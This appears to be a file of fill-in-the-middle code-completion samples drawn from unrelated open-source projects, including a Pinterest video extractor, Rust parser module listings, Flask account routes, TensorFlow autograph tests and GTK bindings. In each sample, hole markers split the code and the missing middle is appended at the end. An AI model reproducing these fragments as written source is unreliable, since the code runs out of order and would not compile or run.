'height': int_or_none(format_dict.get('height')),
'duration': duration,
})
self._sort_formats(
formats, field_preference=('height', 'width', 'tbr', 'format_id'))
description = data.get('description') or data.get('description_html') or data.get('seo_description')
timestamp = unified_timestamp(data.get('created_at'))
def _u(field):
return try_get(data, lambda x: x['closeup_attribution'][field], compat_str)
uploader = _u('full_name')
uploader_id = _u('id')
repost_count = int_or_none(data.get('repin_count'))
comment_count = int_or_none(data.get('comment_count'))
categories = try_get(data, lambda x: x['pin_join']['visual_annotation'], list)
tags = data.get('hashtags')
thumbnails = []
images = data.get('images')
if isinstance(images, dict):
for thumbnail_id, thumbnail in images.items():
if not isinstance(thumbnail, dict):
continue
thumbnail_url = url_or_none(thumbnail.get('url'))
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': description,
'duration': duration,
'timestamp': timestamp,
'thumbnails': thumbnails,
'uploader': uploader,
'uploader_id': uploader_id,
'repost_count': repost_count,
'comment_count': comment_count,
'categories': categories,
'tags': tags,
'formats': formats,
'extractor_key': PinterestIE.ie_key(),
}
class PinterestIE(PinterestBaseIE):
_VALID_URL = r'%s/pin/(?P<id>\d+)' % PinterestBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'https://www.pinterest.com/pin/664281013778109217/',
'md5': '6550c2af85d6d9f3fe3b88954d1577fc',
'info_dict': {
'id': '664281013778109217',
'ext': 'mp4',
'title': 'Origami',
'description': 'md5:b9d90ddf7848e897882de9e73344f7dd',
'duration': 57.7,
'timestamp': 1593073622,
'upload_date': '20200625',
'uploader': 'Love origami -I am Dafei',
'uploader_id': '586523688879454212',
'repost_count': 50,
'comment_count': 0,
'categories': list,
'tags': list,
},
}, {
'url': 'https://co.pinterest.com/pin/824721750502199491/',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
data = self._call_api(
'Pin', video_id, {
'field_set_key': 'unauth_react_main_pin',
'id': video_id,
})['data']
return self._extract_video(data)
class PinterestCollectionIE(PinterestBaseIE):
_VALID_URL = r'%s/(?P<username>[^/]+)/(?P<id>[^/?#&]+)' % PinterestBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'https://www.pinterest.ca/mashal0407/cool-diys/',
'info_dict': {
'id': '585890301462791043',
'title': 'cool diys',
},
'playlist_count': 8,
}, {
'url': 'https://www.pinterest.ca/fudohub/videos/',
'info_dict': {
'id': '682858430939307450',
'title': 'VIDEOS',
},
'playlist_mincount': 365,
'skip': 'Test with extract_formats=False',
}]
@classmethod
def suitable(cls, url):
return False if PinterestIE.suitable(url) else super(
PinterestCollectionIE, cls).suitable(url)
def _real_extract(self, url):
username, slug = re.match(self._VALID_URL, url).groups()
board = self._call_api(
'Board', slug, {
'slug': slug,
'username': username
})['data']
board_id = board['id']
options = {
'board_id': board_id,
'page_size': 250,
}
bookmark = None
entries = []
while True:
if bookmark:
options['bookmarks'] = [bookmark]
board_feed = self._call_api('BoardFeed', board_id, options)
for item in (board_feed.get('data') or []):
if not isinstance(item, dict) or item.get('type') != 'pin':
continue
video_id = item.get('id')
if video_id:
# Some pins may not be available anonymously via pin URL
# video = self._extract_video(item, extract_formats=False)
# video.update({
# '_type': 'url_transparent',
# 'url': 'https://www.pinterest.com/pin/%s/' % video_id,
# })
# entries.append(video)
entries.append(self._extract_video(item))
bookmark = board_feed.get('bookmark')
if not bookmark:
break
return self.playlist_result(
entries, playlist_id=board_id, playlist_title=board.get('name'))<|fim▁end|>
|
continue
format_url = url_or_none(format_dict.get('url'))
if not format_url or format_url in urls:
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
/*!
The Rust parser and macro expander.
# Note
This API is completely unstable and subject to change.
*/
#![crate_id = "syntax#0.11.0"]
#![experimental]
#![license = "MIT/ASL2"]
#![crate_type = "dylib"]
#![crate_type = "rlib"]
#![doc(html_logo_url = "http://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png",
html_favicon_url = "http://www.rust-lang.org/favicon.ico",
html_root_url = "http://doc.rust-lang.org/0.11.0/")]
#![feature(macro_rules, globs, managed_boxes, default_type_params, phase)]
#![feature(quote, unsafe_destructor)]
#![allow(deprecated)]
extern crate serialize;
extern crate term;
#[phase(plugin, link)] extern crate log;
extern crate fmt_macros;
extern crate debug;
pub mod util {
pub mod interner;
#[cfg(test)]
pub mod parser_testing;
pub mod small_vector;
}
pub mod syntax {
pub use ext;
pub use parse;
pub use ast;
}
pub mod owned_slice;
pub mod attr;
pub mod diagnostic;
pub mod codemap;
pub mod abi;
pub mod ast;
pub mod ast_util;
pub mod ast_map;
pub mod visit;
pub mod fold;
pub mod parse;
pub mod crateid;
pub mod print {
pub mod pp;
pub mod pprust;
}<|fim▁hole|>pub mod ext {
pub mod asm;
pub mod base;
pub mod expand;
pub mod quote;
pub mod deriving;
pub mod build;
pub mod tt {
pub mod transcribe;
pub mod macro_parser;
pub mod macro_rules;
}
pub mod mtwt;
pub mod cfg;
pub mod fmt;
pub mod format;
pub mod env;
pub mod bytes;
pub mod concat;
pub mod concat_idents;
pub mod log_syntax;
pub mod source_util;
pub mod trace_macros;
}<|fim▁end|>
| |
<|file_name|>routes.py<|end_file_name|><|fim▁begin|>import flask
from donut import auth_utils
from donut.modules.account import blueprint, helpers
@blueprint.route("/request")
def request_account():
"""Provides a form to request an account."""
return flask.render_template("request_account.html")
@blueprint.route("/request/submit", methods=["POST"])<|fim▁hole|> last_name = flask.request.form.get("last_name", None)
if uid is None or last_name is None:
flask.flash("Invalid request.")
return flask.redirect(flask.url_for("account.request_account"))
success, error_msg = helpers.handle_request_account(uid, last_name)
if success:
flask.flash(
"An email has been sent with a link to create your account.")
return flask.redirect(flask.url_for("home"))
else:
flask.flash(error_msg)
return flask.redirect(flask.url_for("account.request_account"))
@blueprint.route("/create/<create_account_key>")
def create_account(create_account_key):
"""Checks the key. If valid, displays the create account page."""
user_id = auth_utils.check_create_account_key(create_account_key)
if user_id is None:
flask.current_app.logger.warn(
f'Invalid create_account_key: {create_account_key}')
flask.flash("Invalid request. Please check your link and try again.")
return flask.redirect(flask.url_for("home"))
user_data = helpers.get_user_data(user_id)
if user_data is None:
flask.flash("An unexpected error occurred. Please contact DevTeam.")
return flask.redirect(flask.url_for("home"))
return flask.render_template(
"create_account.html", user_data=user_data, key=create_account_key)
@blueprint.route("/create/<create_account_key>/submit", methods=["POST"])
def create_account_submit(create_account_key):
"""Handles a create account request."""
user_id = auth_utils.check_create_account_key(create_account_key)
if user_id is None:
# Key is invalid.
flask.current_app.logger.warn(
f'Invalid create_account_key: {create_account_key}')
flask.flash("Someone's been naughty.")
return flask.redirect(flask.url_for("home"))
username = flask.request.form.get("username", None)
password = flask.request.form.get("password", None)
password2 = flask.request.form.get("password2", None)
if username is None \
or password is None \
or password2 is None:
flask.current_app.logger.warn(
f'Invalid create account form for user ID {user_id}')
flask.flash("Invalid request.")
return flask.redirect(flask.url_for("home"))
if helpers.handle_create_account(user_id, username, password, password2):
flask.session['username'] = username
flask.current_app.logger.info(
f'Created account with username {username} for user ID {user_id}')
flask.flash("Account successfully created.")
return flask.redirect(flask.url_for("home"))
else:
# Flashes already handled.
return flask.redirect(
flask.url_for(
"account.create_account",
create_account_key=create_account_key))<|fim▁end|>
|
def request_account_submit():
"""Handles an account creation request."""
uid = flask.request.form.get("uid", None)
|
<|file_name|>conversion_test.py<|end_file_name|><|fim▁begin|># Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
<|fim▁hole|>
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()<|fim▁end|>
|
def bar(self):
return self.x
class TestSubclass(TestBase):
|
<|file_name|>generate_html.py<|end_file_name|><|fim▁begin|># -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
# logmsg.info('Creating "js" directory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
def create_divs(self, dirpath):
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:<|fim▁hole|> output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
Create a HTML file for an ad.
:param str size: width x height (eg - 300x250)
:param str name: output file name
:rtype bool:
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
description='Generate HTML for banners..')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()<|fim▁end|>
|
continue
|
<|file_name|>level_bar.rs<|end_file_name|><|fim▁begin|>// This file is part of rgtk.
//
// rgtk is free software: you can redistribute it and/or modify
// it under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// rgtk is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with rgtk. If not, see <http://www.gnu.org/licenses/>.
//! A bar that can used as a level indicator
#![cfg_attr(not(feature = "GTK_3_8"), allow(unused_imports))]
use libc::c_double;
use glib::translate::ToGlibPtr;
use gtk::{self, ffi};
use glib::{to_bool, to_gboolean};
use gtk::{LevelBarMode};
use gtk::cast::GTK_LEVELBAR;
/// LevelBar — A bar that can used as a level indicator
/*
* # Signal availables:
* * `offset-changed` : Has Details
*/
struct_Widget!(LevelBar);
impl LevelBar {
pub fn new() -> Option<LevelBar> {
let tmp_pointer = unsafe { ffi::gtk_level_bar_new() };
check_pointer!(tmp_pointer, LevelBar)
}
pub fn new_for_interval(min: f64, max: f64) -> Option<LevelBar> {
let tmp_pointer = unsafe { ffi::gtk_level_bar_new_for_interval(min as c_double, max as c_double) };
check_pointer!(tmp_pointer, LevelBar)
}
pub fn set_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_value(GTK_LEVELBAR(self.pointer)) as f64
}
}
pub fn set_mode(&mut self, mode: LevelBarMode) -> () {
unsafe {
ffi::gtk_level_bar_set_mode(GTK_LEVELBAR(self.pointer), mode);
}
}
pub fn get_mode(&self) -> LevelBarMode {
unsafe {
ffi::gtk_level_bar_get_mode(GTK_LEVELBAR(self.pointer))
}
}
pub fn set_min_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_min_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_min_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_min_value(GTK_LEVELBAR(self.pointer)) as c_double
}
}
pub fn set_max_value(&mut self, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_set_max_value(GTK_LEVELBAR(self.pointer), value as c_double);
}
}
pub fn get_max_value(&self) -> f64 {
unsafe {
ffi::gtk_level_bar_get_max_value(GTK_LEVELBAR(self.pointer)) as c_double
}
}
#[cfg(feature = "GTK_3_8")]
pub fn set_inverted(&mut self, inverted: bool) -> () {
unsafe { ffi::gtk_level_bar_set_inverted(GTK_LEVELBAR(self.pointer), to_gboolean(inverted)); }
}
#[cfg(feature = "GTK_3_8")]
pub fn get_inverted(&self) -> bool {
unsafe { to_bool(ffi::gtk_level_bar_get_inverted(GTK_LEVELBAR(self.pointer))) }
}<|fim▁hole|> GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0,
value as c_double)
}
}
pub fn remove_offset_value(&mut self, name: &str) -> () {
unsafe {
ffi::gtk_level_bar_remove_offset_value(
GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0);
}
}
pub fn get_offset_value(&self, name: &str) -> Option<f64> {
unsafe {
let mut value = 0.;
let res = to_bool(
ffi::gtk_level_bar_get_offset_value(
GTK_LEVELBAR(self.pointer),
name.borrow_to_glib().0,
&mut value));
if res {
Some(value)
}
else {
None
}
}
}
}
impl_drop!(LevelBar);
impl_TraitWidget!(LevelBar);
impl gtk::OrientableTrait for LevelBar {}
impl_widget_events!(LevelBar);<|fim▁end|>
|
pub fn add_offset_value(&mut self, name: &str, value: f64) -> () {
unsafe {
ffi::gtk_level_bar_add_offset_value(
|
<|file_name|>posix.rs<|end_file_name|><|fim▁begin|>use {TryRead, TryWrite};
use io::{self, PipeReader, PipeWriter};
use std::mem;
use std::os::unix::io::{Fd, AsRawFd};
/*
*
* ===== Awakener =====
*
*/
pub struct Awakener {
reader: PipeReader,
writer: PipeWriter,
}
impl Awakener {
pub fn new() -> io::Result<Awakener> {
let (rd, wr) = try!(io::pipe());
Ok(Awakener {
reader: rd,
writer: wr
})<|fim▁hole|> }
pub fn wakeup(&self) -> io::Result<()> {
// A hack, but such is life. PipeWriter is backed by a single FD, which
// is thread safe.
unsafe {
let wr: &mut PipeWriter = mem::transmute(&self.writer);
wr.write_slice(b"0x01").map(|_| ())
}
}
pub fn cleanup(&self) {
let mut buf = [0; 128];
loop {
// Also a bit hackish. It would be possible to split up the read /
// write sides of the awakener, but that would be a more
// significant refactor. A transmute here is safe.
unsafe {
let rd: &mut PipeReader = mem::transmute(&self.reader);
// Consume data until all bytes are purged
match rd.read_slice(&mut buf) {
Ok(Some(i)) if i > 0 => {},
_ => return,
}
}
}
}
}<|fim▁end|>
|
}
pub fn as_raw_fd(&self) -> Fd {
self.reader.as_raw_fd()
|
<|file_name|>test_mrcmemmap.py<|end_file_name|><|fim▁begin|># Copyright (c) 2016, Science and Technology Facilities Council
# This software is distributed under a BSD licence. See LICENSE.txt.
"""
Tests for mrcmemmap.py
"""
# Import Python 3 features for future-proofing
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import unittest
import numpy as np
from .test_mrcfile import MrcFileTest<|fim▁hole|>
class MrcMemmapTest(MrcFileTest):
"""Unit tests for MRC file I/O with memory-mapped files.
Note that this test class inherits MrcFileTest to ensure all of the tests
for MrcObject and MrcFile work correctly for the MrcMemmap subclass.
"""
def setUp(self):
# Set up as if for MrcFileTest
super(MrcMemmapTest, self).setUp()
# Set the newmrc method to the MrcMemmap constructor
self.newmrc = MrcMemmap
# Set up parameters so MrcObject tests run on the MrcMemmap class
obj_mrc_name = os.path.join(self.test_output, 'test_mrcobject.mrc')
self.mrcobject = MrcMemmap(obj_mrc_name, 'w+', overwrite=True)
def test_repr(self):
"""Override test to change expected repr string."""
with MrcMemmap(self.example_mrc_name) as mrc:
assert repr(mrc) == "MrcMemmap('{0}', mode='r')".format(self.example_mrc_name)
def test_exception_raised_if_file_is_too_small_for_reading_data(self):
"""Override test to change expected error message."""
with self.newmrc(self.temp_mrc_name, mode='w+') as mrc:
mrc.set_data(np.arange(24, dtype=np.int16).reshape(2, 3, 4))
assert mrc.header.mz == 2
mrc.header.mz = mrc.header.nz = 3
# The exception type and message are different on Linux and Windows
expected_error_msg = ("mmap length is greater than file size"
"|Not enough storage is available")
with self.assertRaisesRegex(Exception, expected_error_msg):
self.newmrc(self.temp_mrc_name)
def test_data_is_not_copied_unnecessarily(self):
"""Override test because data has to be copied for mmap."""
data = np.arange(6, dtype=np.int16).reshape(1, 2, 3)
self.mrcobject.set_data(data)
assert self.mrcobject.data is not data
def test_data_array_cannot_be_changed_after_closing_file(self):
mrc = self.newmrc(self.temp_mrc_name, mode='w+')
mrc.set_data(np.arange(12, dtype=np.int16).reshape(3, 4))
data_ref = mrc.data
# Check that writing to the data array does not raise an exception
data_ref[0,0] = 1
mrc.close()
assert not data_ref.flags.writeable
with self.assertRaises(ValueError):
data_ref[0,0] = 2
if __name__ == "__main__":
unittest.main()<|fim▁end|>
|
from mrcfile.mrcmemmap import MrcMemmap
|
<|file_name|>_smoothing.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators
class SmoothingValidator(_plotly_utils.basevalidators.NumberValidator):<|fim▁hole|> self, plotly_name="smoothing", parent_name="contourcarpet.line", **kwargs
):
super(SmoothingValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
max=kwargs.pop("max", 1.3),
min=kwargs.pop("min", 0),
**kwargs
)<|fim▁end|>
|
def __init__(
|
<|file_name|>abstractmoduleloader.d.ts<|end_file_name|><|fim▁begin|>declare module goog.module {
/**
* An interface that loads JavaScript modules.
* @interface
*/
interface AbstractModuleLoader {
/**
* Loads a list of JavaScript modules.
*
* @param {Array<string>} ids The module ids in dependency order.
* @param {Object} moduleInfoMap A mapping from module id to ModuleInfo object.
* @param {function()?=} opt_successFn The callback if module loading is a
* success.
* @param {function(?number)?=} opt_errorFn The callback if module loading is an
* error.
* @param {function()?=} opt_timeoutFn The callback if module loading times out.
* @param {boolean=} opt_forceReload Whether to bypass cache while loading the
* module.
*/
loadModules(ids: Array<string>, moduleInfoMap: Object, opt_successFn?: () => any, opt_errorFn?: (arg0: number) => any, opt_timeoutFn?: () => any, opt_forceReload?: boolean): void;
/**
* Pre-fetches a JavaScript module.
*
* @param {string} id The module id.
* @param {!goog.module.ModuleInfo} moduleInfo The module info.
*/<|fim▁hole|> prefetchModule(id: string, moduleInfo: goog.module.ModuleInfo): void;
}
}<|fim▁end|>
| |
<|file_name|>0948.cpp<|end_file_name|><|fim▁begin|>#include<queue>
#include<cstdio>
#include<algorithm>
using namespace std;
const int N = 20012, inf = 2000000000;
int p[N], f[N], t[N], s[N], dg[N];
int main() {
int i, j, n;
while (scanf("%d", &n) == 1 && n) {
fill(dg, dg+n, 0);
fill(s, s+n, inf);
for (i = 0; i < n; ++i) {
scanf("%d %d %d", p+i, f+i, t+i);
++dg[--p[i]];
}
queue<int> Q;
for (i = 0; i < n; ++i)
if (dg[i] == 0) {
s[i] = 0;
Q.push(i);
}
while (!Q.empty()) {
i = Q.front();
Q.pop();
if (p[i] < 0) continue;
j = (t[i] + s[i])*2 + !f[i];
if (j < s[p[i]]) s[p[i]] = j;
if (!--dg[p[i]]) Q.push(p[i]);
}
for (i = 0; p[i] >= 0; ++i);<|fim▁hole|> printf("%d\n", s[i] + t[i]);
}
}<|fim▁end|>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.